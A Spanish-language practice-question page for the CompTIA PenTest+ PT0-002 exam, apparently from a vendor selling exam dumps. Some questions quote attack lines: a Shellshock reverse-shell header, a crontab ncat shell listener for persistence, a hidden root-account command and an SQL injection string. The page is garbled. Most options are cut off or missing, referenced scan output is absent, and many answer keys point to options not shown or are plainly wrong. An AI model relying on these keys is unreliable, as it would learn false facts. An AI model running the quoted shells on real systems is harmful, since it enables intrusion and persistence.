¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Mejor CompTIA PT0-002 Práctica Exámenes y Simulaciones de Examen Real, CompTIA PenTest+ Certificación | SPOTO

Prepárese para el éxito en su certificación CompTIA PenTest+ (PT0-002) con nuestros mejores exámenes de práctica y simulaciones de exámenes reales de CompTIA PT0-002. La mejor manera de prepararse para el examen es practicando con las últimas preguntas de examen. Nuestros exámenes de práctica y simulaciones de exámenes reales están diseñados para proporcionarle una experiencia de examen completa y realista. La certificación CompTIA PenTest+ es ideal para profesionales de ciberseguridad responsables de pruebas de penetración y gestión de vulnerabilidades. Con acceso a pruebas de práctica, preguntas de muestra, vertederos de exámenes y preguntas y respuestas de exámenes, estará bien equipado para demostrar sus habilidades y conocimientos el día del examen. Nuestros exámenes de prueba y el simulador de examen mejoran aún más su preparación al simular las condiciones reales del examen. Utilice nuestros materiales y respuestas de examen para reforzar su comprensión y preparación para el examen PT0-002. Prepárese con confianza y consiga el éxito con nuestros recursos de preparación de exámenes.
Realizar otros exámenes en línea

Cuestionar #1
Un evaluador de intrusiones está explicando el marco ATT&CK de MITRE al asesor jurídico jefe de una empresa. ¿Cuál de las siguientes opciones describiría MÁS probablemente el evaluador como una ventaja del marco?
A. Comprender las tácticas de una intrusión de seguridad puede ayudar a desbaratarlas
B. Los scripts que forman parte del marco pueden importarse directamente a las herramientas SIEM
Ver respuesta
Respuesta correcta: D
Cuestionar #2
Los resultados de un sondeo de Nmap son los siguientes: Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST Informe de sondeo de Nmap para ( 10.2.1.22 ) El host está activo (latencia de 0.0102s). No se muestra: 998 puertos filtrados Puerto Estado Servicio 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check: | VULNERABLE: | Slowloris DoS Attack | <..> Tipo de dispositivo: bridge|general purpose Running (JUST GUESSING) : QEMU (95%) CPE del SO: cpe:/a:qemu:qemu No se han encontrado coincidencias exactas del SO para el host (condiciones de prueba no ideales)
A.
B.
C.
Ver respuesta
Respuesta correcta: D
Cuestionar #3
Un Director de Seguridad de la Información quiere que un especialista en pruebas de penetración evalúe el nivel de concienciación en materia de seguridad de los empleados de la empresa. Cuál de las siguientes herramientas puede ayudar al evaluador a lograr este objetivo?
A. Metasploit B
Ver respuesta
Respuesta correcta: B
Cuestionar #4
Un probador de penetración encontró la siguiente URL válida mientras realizaba una evaluación manual de una aplicación web: http://www.example.com/product.php?id=123987. Cuál de las siguientes herramientas automatizadas sería la mejor para utilizar NEXT para tratar de identificar una vulnerabilidad en esta URL?
A. SQLmap
B. Nessus C
Ver respuesta
Respuesta correcta: B
Cuestionar #5
Durante una prueba de penetración, un consultor realiza un reconocimiento de un cliente para identificar objetivos potenciales para una campaña de phishing. ¿Cuál de las siguientes opciones permitiría al consultor recuperar rápidamente las direcciones de correo electrónico de los contactos técnicos y de facturación, sin activar ninguna de las herramientas de ciberseguridad del cliente? (Elija dos.)
A. Rastreo de redes sociales
B. Utilizar la herramienta de búsqueda WHOIS C
C.
D.
Ver respuesta
Respuesta correcta: C
Cuestionar #6
¿Cuál de los siguientes comandos permitirá a un probador de penetración permitir que un script de shell sea ejecutado por el propietario del archivo?
A. chmod u+x script
B. chmod u+e script
Ver respuesta
Respuesta correcta: BD
Cuestionar #7
Un probador de penetración fue capaz de reunir hashes MD5 de un servidor y crackear los hashes fácilmente con tablas rainbow. Cuál de las siguientes opciones debería incluirse como recomendación en el informe de corrección?
A. Requisitos algorítmicos más estrictos
B. Controles de acceso en el servidor C
Ver respuesta
Respuesta correcta: B
Cuestionar #8
A una empresa le preocupa que su proveedor de servicios en la nube no proteja adecuadamente las máquinas virtuales que albergan su software de desarrollo. Las máquinas virtuales están alojadas en un centro de datos con otras empresas que comparten recursos físicos. ¿Cuál de los siguientes tipos de ataque es el MÁS preocupante para la empresa?
A. Inundación de datos
B. Session riding C
Ver respuesta
Respuesta correcta: B
Cuestionar #9
Un evaluador de penetración que está realizando una evaluación física de las prácticas de seguridad de una empresa se da cuenta de que la empresa no tiene trituradoras de papel dentro del edificio de oficinas. ¿Cuál de las siguientes técnicas sería la MEJOR para obtener información confidencial?
A. Clonación de insignias
B. Bucear en contenedores de basura C
Ver respuesta
Respuesta correcta: A
Cuestionar #10
Un probador de penetración descubre un servidor web vulnerable en 10.10.1.1. A continuación, el probador edita un script Python que envía un exploit web y se encuentra con el siguiente código: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} ¿Cuál de las siguientes modificaciones debe realizar el evaluador en el script para determinar el contexto de usuario en el que se ejecuta el servidor?
A. exploits = {"User-Agent": "() { ignorado;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} C
Ver respuesta
Respuesta correcta: C
Cuestionar #11
Un probador de penetración recibió un archivo .pcap para buscar credenciales para usar en un compromiso. Cuál de las siguientes herramientas debería utilizar para abrir y leer el archivo .pcap?
A. Nmap B
Ver respuesta
Respuesta correcta: C
Cuestionar #12
Una empresa ha contratado a un probador de penetración para desplegar y configurar un punto de acceso falso en la red. ¿Cuál de las siguientes es la MEJOR herramienta para lograr este objetivo? A.Wireshark B.Aircrack-ng C.Kismet D.Wifite
A. na empresa ha contratado a un probador de penetración para desplegar y configurar un punto de acceso falso en la red
Ver respuesta
Respuesta correcta: B
Cuestionar #13
¿Cuál de los siguientes proporciona una matriz de tácticas y técnicas comunes utilizadas por los atacantes junto con las mitigaciones recomendadas? A.NIST SP 800-53 B.OWASP Top 10 C.MITRE ATT&CK framework D.PTES technical guidelines
A. Cuál de los siguientes proporciona una matriz de tácticas y técnicas comunes utilizadas por los atacantes junto con las mitigaciones recomendadas? A
Ver respuesta
Respuesta correcta: C
Cuestionar #14
Un probador de penetración fue capaz de obtener acceso con éxito a una estación de trabajo de Windows en la computadora portátil de un cliente móvil. ¿Cuál de los siguientes se puede utilizar para asegurar que el probador es capaz de mantener el acceso al sistema? A.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B.wmic startup get caption,command C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null D.sudo useradd -ou 0 -g 0 user
A. n probador de penetración fue capaz de obtener acceso con éxito a una estación de trabajo de Windows en la computadora portátil de un cliente móvil
Ver respuesta
Respuesta correcta: C
Cuestionar #15
¿Cuál de las siguientes herramientas sería la MÁS útil para recopilar información sobre proveedores y otra información relevante para la seguridad de los dispositivos IoT con el fin de respaldar el reconocimiento pasivo?
A. Shodan
B. Nmap C
Ver respuesta
Respuesta correcta: D
Cuestionar #16
Los resultados de un escaneo Nmap son los siguientes: ¿Cuál de las siguientes sería la MEJOR conclusión sobre este dispositivo?
A. Este dispositivo puede ser vulnerable al fallo Heartbleed debido a la forma en que las transacciones sobre TCP/22 manejan los paquetes de extensión heartbeat, permitiendo a los atacantes obtener información sensible de la memoria del proceso
B. Lo más probable es que este dispositivo sea una pasarela con servicios de gestión en bandA
Ver respuesta
Respuesta correcta: C
Cuestionar #17
HOTSPOT Usted es un analista de seguridad encargado de reforzar un servidor web. Se le ha proporcionado una lista de cargas útiles HTTP marcadas como maliciosas. INSTRUCCIONES Dadas las siguientes firmas de ataque, determine el tipo de ataque, y luego identifique la remediación asociada para prevenir el ataque en el futuro. Si en algún momento desea volver al estado inicial de la simulación, haga clic en el botón Restablecer todo.
A.
Ver respuesta
Respuesta correcta: D
Cuestionar #18
Una empresa de seguridad ha sido contratada para llevar a cabo una evaluación de amenazas internas para intentar acceder al servidor de recursos humanos que alberga información personal y datos salariales
A. A los evaluadores de penetración se les ha asignado un puesto de inicio en una red internA
B.
C.
D.
Ver respuesta
Respuesta correcta: A
Cuestionar #19
Un probador de penetración ha obtenido acceso a un dispositivo de red que tiene un rango IP previamente desconocido en una interfaz. Investigaciones posteriores determinan que se trata de un túnel VPN siempre activo hacia un proveedor externo. Cuál de las siguientes es la MEJOR acción que debe tomar el probador de penetración?
A. Utilizar el túnel como medio para pivotar hacia otros dispositivos internos
B. Ignorar el rango IP, ya que está fuera del alcance
Ver respuesta
Respuesta correcta: B
Cuestionar #20
Un especialista en pruebas de penetración está iniciando una evaluación, pero sólo dispone de información pública sobre la empresa objetivo. El cliente es consciente de este ejercicio y se está preparando para la prueba. ¿Cuál de las siguientes opciones describe el alcance de la evaluación?
A. Pruebas en entornos parcialmente conocidos
B. Pruebas en entornos conocidos C
Ver respuesta
Respuesta correcta: A
Cuestionar #21
Un probador de penetración está intentando descubrir rápidamente hosts activos en una subred. ¿Cuál de los siguientes comandos realizará un escaneo ping? A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
A. n probador de penetración está intentando descubrir rápidamente hosts activos en una subred
Ver respuesta
Respuesta correcta: D
Cuestionar #22
Una empresa que desarrolla software integrado para la industria del automóvil ha contratado a un equipo de pruebas de penetración para evaluar la seguridad de sus productos antes de su entrega. El equipo de pruebas de penetración ha manifestado su intención de subcontratar a un equipo de ingeniería inversa capaz de analizar binarios para desarrollar exploits de prueba de concepto. La empresa de software ha solicitado investigaciones de antecedentes adicionales sobre el equipo de ingeniería inversa antes de aprobar la subcontratación. ¿Cuál de las siguientes preocupaciones
A. El equipo de ingeniería inversa puede tener un historial de venta de exploits a terceros
B. El equipo de ingeniería inversa puede utilizar fuentes de información cerradas o no públicas para su análisis
Ver respuesta
Respuesta correcta: A
Cuestionar #23
Un probador de penetración estaba forzando un servidor web interno y ejecutó un comando que produjo la siguiente salida: Sin embargo, cuando el investigador intentó navegar por la URL http://172.16.100.10:3000/profile, apareció una página en blanco. ¿Cuál de las siguientes es la razón MÁS probable para la falta de salida?
A. El puerto HTTP no está abierto en el cortafuegos
B. El probador no ejecutó sudo antes del comando
Ver respuesta
Respuesta correcta: A
Cuestionar #24
El siguiente fragmento de código Python numerado por líneas se está utilizando en reconocimiento: ¿Cuál de los siguientes números de línea del script contribuyó MÁS probablemente a que el script activara una alerta de "probable escaneo de puerto" en el IDS de la organización?
A. Línea 01
B. Línea 02 C
Ver respuesta
Respuesta correcta: C
Cuestionar #25
¿Cuál de las siguientes opciones describe MEJOR por qué un cliente celebraría una reunión sobre las lecciones aprendidas con el equipo de pruebas de penetración?
A. Aportar comentarios sobre la estructura del informe y recomendar mejoras
B. Debatir los resultados y cuestionar los falsos positivos C
Ver respuesta
Respuesta correcta: B
Cuestionar #26
Un probador de penetración ha sido contratado para realizar una prueba de penetración física para obtener acceso a una sala segura dentro del edificio de un cliente. El reconocimiento exterior identifica dos entradas, una red WiFi para invitados y varias cámaras de seguridad conectadas a Internet. ¿Cuál de las siguientes herramientas o técnicas apoyaría MEJOR el reconocimiento adicional?
A. Wardriving
B. Shodan C
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Una empresa obtuvo permiso para realizar un análisis de vulnerabilidades de su proveedor de servicios en la nube y ahora desea comprobar la seguridad de sus datos alojados. Cuál de los siguientes aspectos debe verificar PRIMERO el evaluador para valorar este riesgo?
A. Si los datos sensibles de los clientes son de acceso público
B. Si la conexión entre la nube y el cliente es segura C
Ver respuesta
Respuesta correcta: AC
Cuestionar #28
Un evaluador de penetración ejecutó los siguientes comandos en un servidor Windows: ¿Cuál de las siguientes acciones debe realizar el evaluador DESPUÉS de entregar el informe final?
A. Elimine el trabajo por lotes programado
B. Cerrar la conexion reverse shell
Ver respuesta
Respuesta correcta: B
Cuestionar #29
El Director General de una empresa ha creado una oficina doméstica secundaria y le preocupa que el servicio WiFi que se utiliza sea vulnerable a un ataque. Se contrata a un probador de penetración para que compruebe la seguridad del router del WiFi. ¿Cuál de las siguientes opciones es MÁS vulnerable a un ataque de fuerza bruta? A.WPS B.WPA2-EAP C.WPA-TKIP D.WPA2-PSK
A. l Director General de una empresa ha creado una oficina doméstica secundaria y le preocupa que el servicio WiFi que se utiliza sea vulnerable a un ataque
Ver respuesta
Respuesta correcta: A
Cuestionar #30
A un probador de penetración se le han dado ocho horas de trabajo para obtener acceso al sistema financiero de un cliente. ¿Cuál de las siguientes técnicas tendrá más probabilidades de éxito?
A. Intentar seguir a un empleado que se dirige al lugar de trabajo del cliente
B. Arrojar una llave USB maliciosa con el logotipo de la empresa en el aparcamiento C
Ver respuesta
Respuesta correcta: B
Cuestionar #31
Un probador de penetración realizó un escaneo de vulnerabilidades contra los servidores críticos de un cliente y encontró lo siguiente: ¿Cuál de las siguientes sería una recomendación para la corrección?
A. Implantar un programa de formación de usuarios
B. Implantar un plan de gestión de parches C
Ver respuesta
Respuesta correcta: C
Cuestionar #32
Un escaneo Nmap muestra puertos abiertos en servidores web y bases de datos. Un probador de penetración decide ejecutar WPScan y SQLmap para identificar vulnerabilidades e información adicional sobre esos sistemas. ¿Cuál de las siguientes acciones está intentando llevar a cabo el evaluador de intrusiones?
A. Descubrir posibles actividades delictivas basándose en las pruebas recogidas
B. Identificar todas las vulnerabilidades del entorno
Ver respuesta
Respuesta correcta: A
Cuestionar #33
¿Cuál de las siguientes es la vulnerabilidad MÁS común asociada a los dispositivos IoT que están conectados directamente a Internet?
A. Sistemas operativos no compatibles
B. Susceptibilidad a ataques DDoS C
Ver respuesta
Respuesta correcta: A
Cuestionar #34
Un probador de penetración lleva a cabo una exploración Nmap contra un objetivo y recibe los siguientes resultados: ¿Cuál de las siguientes opciones debería utilizar el evaluador para redirigir las herramientas de exploración utilizando el puerto TCP 1080 en el objetivo?
A. Nessus
B. ProxyChains C
Ver respuesta
Respuesta correcta: D
Cuestionar #35
Un gran cliente quiere que un probador de penetración escanee los dispositivos dentro de su red que están orientados a Internet. El cliente busca específicamente dispositivos Cisco sin requisitos de autenticación. ¿Cuál de las siguientes opciones de Shodan cumpliría los requisitos del cliente?
A. "cisco-ios" "admin+1234"
B. "cisco-ios" "no-password" C
Ver respuesta
Respuesta correcta: D
Cuestionar #36
Un probador de penetración es capaz de capturar el tráfico NTLM desafío-respuesta entre un cliente y un servidor. Cuál de las siguientes acciones se puede realizar con el pcap para obtener acceso al servidor?
A. Realizar escalada vertical de privilegios
B. Reproducir el tráfico capturado al servidor para recrear la sesión
Ver respuesta
Respuesta correcta: C
Cuestionar #37
¿Cuál de las siguientes opciones describe la razón por la que un probador de penetración ejecutaría el comando sdelete mimikatz. * en un servidor Windows que el probador comprometió?
A. Para eliminar las entradas de registro de hash-cracking
B. Para eliminar la cuenta Mimikatz creada por el probador C
Ver respuesta
Respuesta correcta: C
Cuestionar #38
Un nuevo cliente ha contratado a una empresa de pruebas de penetración por un mes para realizar varias evaluaciones de seguridad del nuevo servicio del cliente. El cliente espera poner el nuevo servicio a disposición del público poco después de que se complete la evaluación y planea corregir cualquier hallazgo, excepto los problemas críticos, después de que el servicio se haga público. El cliente desea una estructura de informe sencilla y no quiere recibir resultados diarios. ¿Cuál de las siguientes opciones es más importante que defina el evaluador de la penetración?
A. Establecer el formato requerido por el cliente
B. Establecer el umbral de riesgo para escalar al cliente inmediatamente
Ver respuesta
Respuesta correcta: B
Cuestionar #39
Un probador de penetración realizó una evaluación en un servidor web. Los registros de esta sesión muestran lo siguiente: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- ¿Cuál de los siguientes ataques se está intentando? A.Clickjacking
A.
Ver respuesta
Respuesta correcta: B
Cuestionar #40
Una prueba de penetración basada en el cumplimiento se ocupa principalmente de:
A. obtener Pll de la red protegidA
B. eludir la protección de los dispositivos periféricos
Ver respuesta
Respuesta correcta: C
Cuestionar #41
Una empresa consultora está completando la ROE durante la determinación del alcance. Cuál de los siguientes puntos debe incluirse en la ROE?
A. Coste de la evaluación
B. Distribución de informes C
Ver respuesta
Respuesta correcta: A
Cuestionar #42
A una persona que realiza pruebas de penetración se le ha asignado la tarea de atacar una serie de objetivos en el rango 192.168.1.0/24, activando el menor número posible de alarmas y contramedidas. ¿Cuál de las siguientes sintaxis de análisis de Nmap sería la MEJOR para lograr este objetivo?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
Ver respuesta
Respuesta correcta: A
Cuestionar #43
Una empresa contrató a un probador de penetración para hacer una prueba de ingeniería social contra sus empleados. Aunque el probador no encontró ningún número de teléfono de los empleados en el sitio web de la empresa, el probador se ha enterado de que el catálogo completo de teléfonos se publicó allí hace unos meses. ¿En cuál de los siguientes lugares debería buscar PRIMERO el probador de penetración los números de los empleados?
A. Archivo web B
Ver respuesta
Respuesta correcta: A
Cuestionar #44
Una empresa de software ha contratado a un probador de penetración para realizar una prueba de penetración en un servidor de base de datos. El probador ha recibido una variedad de herramientas utilizadas por la política de privacidad de la empresa. ¿Cuál de las siguientes sería la MEJOR para usar para encontrar vulnerabilidades en este servidor? A.OpenVAS B.Nikto C.SQLmap D.Nessus
A. na empresa de software ha contratado a un probador de penetración para realizar una prueba de penetración en un servidor de base de datos
Ver respuesta
Respuesta correcta: A
Cuestionar #45
SIMULACIÓN Usted es un probador de penetración ejecutando escaneos de puertos en un servidor. INSTRUCCIONES Parte 1: Dada la salida, construya el comando que se utilizó para generar esta salida a partir de las opciones disponibles. Parte 2: Una vez que el comando esté construido apropiadamente, use la salida dada para identificar los vectores de ataque potenciales que deberían ser investigados más a fondo. Si en algún momento desea restablecer el estado inicial de la simulación, haga clic en el botón Restablecer todo.
A. Véase la explicación más abajo
Ver respuesta
Respuesta correcta: C
Cuestionar #46
¿Cuál de los siguientes debe atacar un probador de penetración para obtener el control del estado en el protocolo HTTP después de que el usuario ha iniciado sesión?
A. Comunicación HTTPS
B. Claves públicas y privadas C
Ver respuesta
Respuesta correcta: A

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: